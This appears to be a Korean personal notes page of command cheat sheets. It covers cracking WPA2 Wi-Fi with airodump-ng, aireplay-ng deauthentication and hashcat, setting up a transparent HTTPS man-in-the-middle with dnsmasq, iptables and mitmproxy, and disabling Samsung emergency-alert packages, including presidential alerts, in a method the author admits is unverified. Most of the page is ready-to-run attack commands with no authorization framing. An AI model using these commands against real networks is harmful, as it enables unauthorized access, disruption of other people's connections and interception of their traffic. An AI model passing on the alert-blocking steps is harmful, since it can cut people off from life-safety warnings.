가야하는 곳이 아닌 가고싶은 곳
WPA2 Crack with hashcat
WPA2는 인증할때 salt와 kdf2값의 패킷을 수집하여 이를 BF 또는 Dict 공격하는 방법이 있다.
Enter wlan interface to monitor mode
airmon-ng start wlp4s0
airmon-ng check kill
rfkill list
rfkill unblock [dev_id]
Scan APs
airodump-ng -c 5 wlp4s0mo [–band a (for 5ghz)]
airodump-ng –bssid [bssid] -c 6 –write packet wlp4s0mo
Send Deauth Packet
aireplay-ng –deauth 100 -a [Station] wlp4s0mo
Convert cap to haccpx – out dated way
cap2hccapx.bin packet-01.cap out.haccpx
Convert cap to hc22000
hcxpcapngtool -o hash.hc22000 -E wordlist dumpfile.pcapng
Run hashcat
hashcat -m 2500 out.hccapx -a3 -?d?d?d?d?d?d?d?d -w3
hashcat -m 22000 hash.hc22000 wordlist.txt
or use aircrack-ng
$ aircrack-ng dumpfile.pcapng -w wordlist.txt
Python requests with cache
import requests
import requests_cache
requests_cache.install_cache(‘requests_cache’)
res=requests.get(start_url)
HTTPS MITM with transparent mode
set ipaddress for client adaptor
Edit /etc/network/interfaces
:
# Proxy Server network interface
auto eth1
iface eth1 inet static
address 192.168.3.1
netmask 255.255.255.0
gateway 0.0.0.0
solve 53 port confiliction
# vi /etc/systemd/resolved.conf > DNSStubListener=no
# systemctl restart systemd-resolved
config dnsmasq
Then replace /etc/dnsmasq.conf
with:
# Listen for DNS requests on the internal network
interface=eth1
# Act as a DHCP server, assign IP addresses to clients
dhcp-range=192.168.3.10,192.168.3.100,96h
# Broadcast gateway and dns server information
dhcp-option=option:router,192.168.3.1
dhcp-option=option:dns-server,192.168.3.1
# systemctl restart dnsmasq
Sysctls
sysctl -w net.ipv4.ip_forward=1
sysctl -w net.ipv6.conf.all.forwarding=1
sysctl -w net.ipv4.conf.all.send_redirects=0
Rrerouting
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 443 -j REDIRECT --to-port 8080
Start mitmproxy
$ mitmweb --mode transparent --showhost
https://docs.mitmproxy.org/stable/concepts-modes/#socks-proxy
https://docs.mitmproxy.org/stable/howto-transparent/
https://nickcharlton.net/posts/transparent-proxy-virtual-machines-mitmproxy.html
삼성 갤럭시 재난알림문자 차단 방법
재난문자는 Cell Broadcast Service라고도 불리며 Wartime alert, Information notification, Emergency alert 3가지 단계가 있는데 이중 Wartime alert은 유저레벨에서 컨트롤이 불가능하다. (코드상 cmas_presidential_level_alert)
하지만 관련 패키지를 비활성화 시키면 차단이 가능하다.
관련 패키지를 확인해보면 아래와 같이 4개의 패키지가 확인되는데 (SGS10 5G 기준)
$ pm list packages -f | grep cellbroadcast
package:/system/system_ext/overlay/CellBroadcastConfigOverlayPlatform_KR.apk=com.google.android.overlay.modules.cellbroadcastreceiver
package:/system/system_ext/priv-app/CellBroadcastAppPlatform/CellBroadcastAppPlatform.apk=com.android.cellbroadcastreceiver
package:/system/priv-app/CellBroadcastServiceModulePlatform/CellBroadcastServiceModulePlatform.apk=com.android.cellbroadcastservice
package:/system/system_ext/overlay/CellBroadcastServiceOverlay.apk=com.google.android.overlay.modules.cellbroadcastservice
아래의 명령어로 몽땅 비활성화 시켜준다.
$ pm disable-user –user 0 com.google.android.overlay.modules.cellbroadcastreceiver
$ pm disable-user –user 0 com.android.cellbroadcastreceiver
$ pm disable-user –user 0 com.android.cellbroadcastservice
$ pm disable-user –user 0 com.google.android.overlay.modules.cellbroadcastservice
이후 확인해보면
재난알림 관련 항목들이 사라진것을 볼 수 있다.
※사실 확인 되지 않은 방법임 (이후로 받아볼수가 없었다…) 책임은 각자 알아서,